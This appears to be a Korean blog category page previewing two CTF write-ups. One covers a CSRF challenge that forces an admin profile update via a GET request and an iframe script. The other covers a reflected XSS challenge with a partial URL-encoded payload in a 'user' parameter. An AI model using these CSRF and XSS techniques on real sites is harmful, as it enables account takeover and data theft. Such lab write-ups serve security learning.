CTF (2) 썸네일형 리스트형 CTF CSRF CTF CSRF GET Admin 1 회원가입 id pw 로그인 id pw id=&info=&pw=1 GET /csrf_1/mypage_update.php?id=&info=&pw=1 get 방식으로 전환 접속시 alert 회원정보 수정에 성공했다는 메세지 뜸 get방식 사용가능 그러나 관리자가 눈치챔 게시판 글쓰기 ------WebKitFormBoundarypBXHwQx5OA8BdH3i Content-Disposition: form-data; name="create_title" title content // iframe 내의 document에 접근 var iframeDocument = iframe.contentDocument || iframe.contentWindow.document; // iframe .. CTF ClientScript CTF ClientScript Basic Script Prac id,pw로 로그인 마이페이지 접속 placeholder값 가져오기 xss point GET /scriptBasic/mypage.php?user=iddddd -> user= "/> // -> getElementsByName은 배열이므로 [0]을 사용해서 첫번째 요소를 선택햐야한다 user="/> // -> 가져올 요소 값이 xss point 뒤에 존재해 img 태그 이용 user="/> // -> Flag Here..! 값 출력 user="/> http://ctf.segfaulthub.com:4343/scriptBasic/mypage.php?user=%22%2f%3e%20%3c%73%63%72%69%70%74%3e%0a%0a%76%61%72%.. 이전 1 다음